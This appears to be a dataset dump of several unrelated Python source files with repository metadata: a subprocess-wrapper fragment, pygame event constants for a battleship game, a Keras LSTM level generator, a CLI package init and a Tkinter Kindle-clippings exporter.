    RuntimeError carrying the full traceback; pip invocations additionally
    report the failing package name.
    """
    if force_shell:
      kwargs['shell'] = True
    try:
      out = subprocess.check_call(*args, **kwargs)
    except OSError:
      raise RuntimeError("Executable {} not found".format(args[0]))
    except subprocess.CalledProcessError as error:
      # args[0][2] == "pip" assumes a command shaped like
      # [executable, '-m', 'pip', 'install', ..., <package>]; args[0][6]
      # would then be the package name -- TODO confirm against callers.
      if isinstance(args, tuple) and (args[0][2] == "pip"):
        raise RuntimeError( \
          "Full traceback: {} \n Pip install failed for package: {} \
          \n Output from execution of subprocess: {}" \
          .format(traceback.format_exc(), args[0][6], error.output))
      else:
        raise RuntimeError("Full trace: {} \
          \n Output of the failed child process: {}" \
          .format(traceback.format_exc(), error.output))
    return out

  def check_output(*args, **kwargs):
    """subprocess.check_output, with shell=True forced on Windows.

    Error handling mirrors check_call; on success returns the child's
    captured stdout.
    """
    if force_shell:
      kwargs['shell'] = True
    try:
      out = subprocess.check_output(*args, **kwargs)
    except OSError:
      raise RuntimeError("Executable {} not found".format(args[0]))
    except subprocess.CalledProcessError as error:
      # Same pip-command shape assumption as in check_call above.
      if isinstance(args, tuple) and (args[0][2] == "pip"):
        raise RuntimeError( \
          "Full traceback: {} \n Pip install failed for package: {} \
          \n Output from execution of subprocess: {}" \
          .format(traceback.format_exc(), args[0][6], error.output))
      else:
        raise RuntimeError("Full trace: {}, \
           output of the failed child process {} "\
          .format(traceback.format_exc(), error.output))
    return out

  def Popen(*args, **kwargs):
    """subprocess.Popen, with shell=True forced on Windows."""
    if force_shell:
      kwargs['shell'] = True
    return subprocess.Popen(*args, **kwargs)
| 2,275 | 0 | 100 |
fb2e165b9cab12205cb49a14697d29f1f446e88a | 636 | py | Python | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | null | null | null | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | 6 | 2016-12-08T17:33:32.000Z | 2016-12-15T02:24:42.000Z | bship/events.py | UTDS16/battleship | 0244dd350fd628baf0928762ea49352ab418660c | [
"MIT"
] | null | null | null | import pygame
# Custom pygame user-event ids for the game.
# It seems that up to USEREVENT + 3 are already taken elsewhere, so ours
# start at USEREVENT + 4.
# Event for server announces: the server advertising its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred (one of the S_* values below).
E_STATE = pygame.USEREVENT + 5
# Player states. Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
# Highest valid state value (presumably for range checks -- TODO confirm).
S_GAME_LAST = 6
| 23.555556 | 59 | 0.738994 | import pygame
# Custom pygame user-event ids for the game.
# It seems that up to USEREVENT + 3 are already taken elsewhere, so ours
# start at USEREVENT + 4.
# Event for server announces: the server advertising its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred (one of the S_* values below).
E_STATE = pygame.USEREVENT + 5
# Player states. Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
# Highest valid state value (presumably for range checks -- TODO confirm).
S_GAME_LAST = 6
| 0 | 0 | 0 |
0918669d246dee92735957bcb29fa3a26b3a47f8 | 4,036 | py | Python | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | LSTM/code/model.py | ayush1997/DLG | 99b030eb68a2f5e7f30b0213249eb03d11bcceef | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os
if __name__ == "__main__":
all_folders = "../levels_transposed/"
result_path = "../levels_prediction_textfiles/"
original_level_path = all_folders + sys.argv[1]
try:
text = open(original_level_path).read().lower()
except UnicodeDecodeError:
import codecs
text = codecs.open(original_level_path, encoding='utf-8').read().lower()
chars = set(text)
words = set(open(original_level_path).read().lower().split())
word_indices = dict((c, i) for i, c in enumerate(words))
indices_word = dict((i, c) for i, c in enumerate(words))
maxlen = 30
step = 3
print("maxlen:",maxlen,"step:", step)
sentences = []
next_words = []
next_words= []
sentences1 = []
list_words = []
sentences2=[]
list_words=text.lower().split()
for i in range(0,len(list_words)-maxlen, step):
sentences2 = ' '.join(list_words[i: i + maxlen])
sentences.append(sentences2)
next_words.append((list_words[i + maxlen]))
# print('Vectorization...')
X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)
y = np.zeros((len(sentences), len(words)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, word in enumerate(sentence.split()):
#print(i,t,word)
X[i, t, word_indices[word]] = 1
y[i, word_indices[next_words[i]]] = 1
#build the model: 2 stacked LSTM
# print('Build model...')
model = Sequential()
model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
model.add(Dropout(0.2))
model.add(LSTM(512, return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(len(words)))
#model.add(Dense(1000))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
if os.original_level_path.isfile('GoTweights'):
model.load_weights('GoTweights')
# train the model, output generated text after each iteration
for iteration in range(1, 300):
print()
print('-' * 50)
print('Iteration', iteration)
model.fit(X, y, batch_size=64, nb_epoch=2)
#model.save_weights('GoTweights',overwrite=True)
start_index = random.randint(0, len(list_words) - maxlen - 1)
predictionText = open(result_path + os.original_level_path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
loop_range = [1.0,1.2]
for diversity in loop_range:
print()
print('----- diversity:', diversity)
generated = ''
sentence = list_words[start_index: start_index + maxlen]
generated += ' '.join(sentence)
print('----- Generating with seed: "' , sentence , '"')
print()
sys.stdout.write(generated)
print()
for i in range(1024):
x = np.zeros((1, maxlen, len(words)))
for t, word in enumerate(sentence):
x[0, t, word_indices[word]] = 1.
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, diversity)
next_word = indices_word[next_index]
generated += next_word
predictionText.write(next_word+"\n")
del sentence[0]
sentence.append(next_word)
sys.stdout.write(' ')
sys.stdout.write(next_word)
sys.stdout.flush()
print()
| 33.081967 | 131 | 0.601338 | from __future__ import print_function
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os
if __name__ == "__main__":
    # Input levels live here; generated levels are written to result_path.
    all_folders = "../levels_transposed/"
    result_path = "../levels_prediction_textfiles/"
    original_level_path = all_folders + sys.argv[1]
    # Read the level file as lower-case text, retrying with an explicit
    # UTF-8 codec when the default encoding cannot decode it.
    try:
        text = open(original_level_path).read().lower()
    except UnicodeDecodeError:
        import codecs
        text = codecs.open(original_level_path, encoding='utf-8').read().lower()
    # Vocabulary: every distinct whitespace-separated token of the level.
    words = set(open(original_level_path).read().lower().split())
    word_indices = dict((c, i) for i, c in enumerate(words))
    indices_word = dict((i, c) for i, c in enumerate(words))
    # Training windows: `maxlen` consecutive tokens predict the next token;
    # a new window starts every `step` tokens.
    maxlen = 30
    step = 3
    print("maxlen:",maxlen,"step:", step)
    sentences = []
    next_words = []
    list_words = text.lower().split()
    for i in range(0, len(list_words) - maxlen, step):
        sentences.append(' '.join(list_words[i: i + maxlen]))
        next_words.append(list_words[i + maxlen])
    # One-hot encode the windows (X) and their next-word targets (y).
    # NOTE(review): np.bool is removed in NumPy >= 1.24; with a modern NumPy
    # this would have to be plain `bool`.
    X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)
    y = np.zeros((len(sentences), len(words)), dtype=np.bool)
    for i, sentence in enumerate(sentences):
        for t, word in enumerate(sentence.split()):
            X[i, t, word_indices[word]] = 1
        y[i, word_indices[next_words[i]]] = 1
    # Build the model: 2 stacked LSTMs with dropout, softmax over the vocab.
    model = Sequential()
    model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
    model.add(Dropout(0.2))
    model.add(LSTM(512, return_sequences=False))
    model.add(Dropout(0.2))
    model.add(Dense(len(words)))
    model.add(Activation('softmax'))
    model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
    # BUG FIX: was `os.original_level_path.isfile(...)`, which raises
    # AttributeError (a bad rename of os.path). Resume from saved weights
    # when they exist.
    if os.path.isfile('GoTweights'):
        model.load_weights('GoTweights')

    def sample(a, temperature=1.0):
        """Sample an index from probability array `a`; a higher `temperature`
        flattens the distribution (more adventurous choices)."""
        a = np.log(a) / temperature
        a = np.exp(a) / np.sum(np.exp(a))
        return np.argmax(np.random.multinomial(1, a, 1))

    # Train the model, writing freshly generated text to disk after each
    # iteration.
    for iteration in range(1, 300):
        print()
        print('-' * 50)
        print('Iteration', iteration)
        model.fit(X, y, batch_size=64, nb_epoch=2)
        start_index = random.randint(0, len(list_words) - maxlen - 1)
        # BUG FIX: was `os.original_level_path.splitext(...)`; os.path was
        # intended here as well.
        predictionText = open(result_path + os.path.splitext(sys.argv[1])[0] + "_new_"+str(iteration)+".txt", "w+")
        loop_range = [1.0,1.2]
        for diversity in loop_range:
            print()
            print('----- diversity:', diversity)
            generated = ''
            sentence = list_words[start_index: start_index + maxlen]
            generated += ' '.join(sentence)
            print('----- Generating with seed: "' , sentence , '"')
            print()
            sys.stdout.write(generated)
            print()
            for i in range(1024):
                x = np.zeros((1, maxlen, len(words)))
                for t, word in enumerate(sentence):
                    x[0, t, word_indices[word]] = 1.
                preds = model.predict(x, verbose=0)[0]
                next_index = sample(preds, diversity)
                next_word = indices_word[next_index]
                generated += next_word
                predictionText.write(next_word+"\n")
                # Slide the seed window forward by one token.
                del sentence[0]
                sentence.append(next_word)
                sys.stdout.write(' ')
                sys.stdout.write(next_word)
                sys.stdout.flush()
            print()
        # BUG FIX: close the per-iteration output file instead of leaking
        # the handle until interpreter exit.
        predictionText.close()
| 215 | 0 | 27 |
281b2bb040823d5ed05354eed9b4ed54853060af | 691 | py | Python | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 3 | 2019-10-19T15:07:34.000Z | 2022-01-07T01:49:24.000Z | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | null | null | null | abcli/__init__.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 1 | 2022-03-12T03:22:29.000Z | 2022-03-12T03:22:29.000Z | # CLI
#
# Planned commands:
# - transactions import <json>
# - transaction show (?)
# - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
#     Shows balance, average in aggregation method, between two dates
# - account graph [name] [date-from] [date-to] [aggregation:...]
# - budget import <json>
# - budget show [name] [account]
#     Shows progress & summary of a named budget
# - budget project [name] [unit] [aggregation:...]
import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs
# TODO: maybe load format from a config file?
# Package-level side effect: install colored output on the root logger.
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| 36.368421 | 97 | 0.681621 | # CLI
#
# Planned commands:
# - transactions import <json>
# - transaction show (?)
# - account show [name] [date-from] [date-to] [aggregation:week|fortnight|*month*|quarter|year]
#     Shows balance, average in aggregation method, between two dates
# - account graph [name] [date-from] [date-to] [aggregation:...]
# - budget import <json>
# - budget show [name] [account]
#     Shows progress & summary of a named budget
# - budget project [name] [unit] [aggregation:...]
import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs
# TODO: maybe load format from a config file?
# Package-level side effect: install colored output on the root logger.
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| 0 | 0 | 0 |
07ea35374229480bf2eea63ea423ff927d92c861 | 5,564 | py | Python | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | application.py | naimaier/kindle-notes | 47efaf8c314211e57754db836c1c17243543cfc0 | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter import ttk
from functools import partial
# Generate the main window and build the GUI on it.
root = Tk()
gui = Application(root)
# Necessary for winfo_width and winfo_height to report real values: the
# window must process pending geometry events first.
root.update()
""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height
# Gets the current values of the window height and width.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()
# Gets both half the screen width/height and window width/height.
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)
# Positions the window in the center of the screen.
root.geometry("+{}+{}".format(positionRight, positionDown))
root.mainloop() | 30.571429 | 107 | 0.614845 | from tkinter import *
from tkinter import ttk
from functools import partial
class MyClippings():
    """Container for parsed clippings: dicts with 'book', 'info', 'content'."""

    def __init__(self):
        # BUG FIX: `clippings` used to be a mutable class attribute, so every
        # instance (and the class itself) shared one list; make it
        # per-instance.
        self.clippings = []

    def append(self, element):
        """Store one parsed clipping dict."""
        self.clippings.append(element)

    def getBookNames(self):
        """Return the distinct book titles seen so far (unordered)."""
        return list({clipping['book'] for clipping in self.clippings})

    def getClippingsFromBook(self, book):
        """Return all clippings whose 'book' equals `book`, in insertion order."""
        return [clipping for clipping in self.clippings
                if clipping['book'] == book]
class Application():
    """Tkinter GUI that loads a Kindle 'My Clippings.txt' file, lets the
    user pick a book, and (eventually) exports that book's clippings."""

    def __init__(self, root):
        ''' Build the GUI. '''
        # BUG FIX: `myClippings` and `remove_duplicates` were class
        # attributes, so the clippings list was shared by all instances and
        # IntVar() was created at class-definition time -- before any Tk
        # root window exists. Both are now created per instance.
        # List containing all the clippings.
        self.myClippings = MyClippings()
        self.remove_duplicates = IntVar()
        self.root = root
        self.root.title("Kindle Notes Exporter")
        self.root.resizable(height=False, width=False)
        self.main_frame = Frame(self.root, padx=10, pady=10)
        self.main_frame.pack(expand=True)
        self.lbl_title = Label(master=self.main_frame,
                               font="Verdana 20 bold",
                               padx=10, pady=10,
                               text="Kindle Note Exporter")
        self.lbl_title.pack()
        # Input button.
        self.btn_input = Button(master=self.main_frame, text="Load 'My Clippings.txt'")
        self.btn_input["command"] = partial(self.load_input_file)
        self.btn_input.pack()
        # Options.
        self.combobox_books = ttk.Combobox(master=self.main_frame)
        self.combobox_books.pack()
        self.chk_remove_duplicates = Checkbutton(master=self.main_frame,
                                                 text="Remove duplicates",
                                                 variable=self.remove_duplicates)
        # BUG FIX: the checkbutton was created but never packed, so it was
        # invisible.
        self.chk_remove_duplicates.pack()
        # Export button.
        self.btn_export = Button(master=self.main_frame, text="Export")
        self.btn_export["command"] = partial(self.export)
        self.btn_export.pack()

    def load_input_file(self):
        """Read the Kindle clippings file (hard-coded name, looked up in the
        current working directory), parse it, and fill the book combobox."""
        with open('My Clippings.txt') as clippings_file:
            fileContent = clippings_file.read()
        self.parseFileContent(fileContent)
        self.populateComboBox()

    def parseFileContent(self, fileContent):
        """Split the raw file on its '==========' separators and store every
        parsed (non-bookmark) clipping."""
        elements = fileContent.split('==========')
        # The file ends with a separator, so the last element is always blank.
        elements.pop()
        for element in elements:
            clipping = self.parseElement(element)
            if clipping is not None:
                self.myClippings.append(clipping)

    def parseElement(self, element):
        """Parse one clipping into {'book', 'info', 'content'}.

        Bookmarks carry no content line (only two non-blank lines) and
        yield None.
        """
        lines = list(filter(None, element.split('\n')))
        if len(lines) == 3:
            parsedElement = {}
            parsedElement['book'] = lines[0]
            parsedElement['info'] = self.parseElementInfo(lines[1])
            parsedElement['content'] = lines[2]
            return parsedElement
        # Bookmark (or malformed entry): nothing to keep.
        return None

    def parseElementInfo(self, elementInfo):
        """Parse the metadata line: 'type | position | date', or
        'type | date' when no position is present (position becomes None)."""
        parts = elementInfo.split(' | ')
        parsedElementInfo = {}
        if len(parts) == 3:
            parsedElementInfo['type'] = parts[0]
            parsedElementInfo['position'] = parts[1]
            parsedElementInfo['date'] = parts[2]
        else:
            parsedElementInfo['type'] = parts[0]
            parsedElementInfo['position'] = None
            parsedElementInfo['date'] = parts[1]
        return parsedElementInfo

    def populateComboBox(self):
        """Offer every distinct book title in the combobox."""
        self.combobox_books['values'] = self.myClippings.getBookNames()

    def filterClippings(self):
        """Apply the user's filter options to the loaded clippings."""
        # BUG FIX: the original compared the bound method itself
        # (`self.remove_duplicates.get == 1`), which is always False.
        if self.remove_duplicates.get() == 1:
            self.checkDuplicates()

    def checkDuplicates(self):
        """Drop clippings whose text is contained in another clipping of the
        same book."""
        # BUG FIX: iterate over a copy; the original removed items from the
        # very list it was iterating, which skips elements.
        for clipping in list(self.myClippings.clippings):
            if self.isDuplicate(clipping):
                self.myClippings.clippings.remove(clipping)

    def isDuplicate(self, input_clipping):
        """True when some *other* clipping of the same book contains this
        clipping's text (presumably how re-edited highlights show up --
        TODO confirm against real Kindle data)."""
        for clipping in self.myClippings.clippings:
            # BUG FIX: skip the clipping itself; its text trivially contains
            # itself, so the original flagged everything as a duplicate.
            if clipping is input_clipping:
                continue
            # BUG FIX: the original `break`-ed on the first clipping from a
            # different book, abandoning the rest of the scan.
            if input_clipping['book'] != clipping['book']:
                continue
            if input_clipping['content'] in clipping['content']:
                return True
        return False

    def export(self):
        """Export the selected book's clippings -- not implemented yet."""
        pass
# Generate the main window and build the GUI on it.
root = Tk()
gui = Application(root)
# Necessary for winfo_width and winfo_height to report real values: the
# window must process pending geometry events first.
root.update()
""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height
# Gets the current values of the window height and width.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()
# Gets both half the screen width/height and window width/height.
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)
# Positions the window in the center of the screen.
root.geometry("+{}+{}".format(positionRight, positionDown))
root.mainloop() | 2,853 | 1,774 | 46 |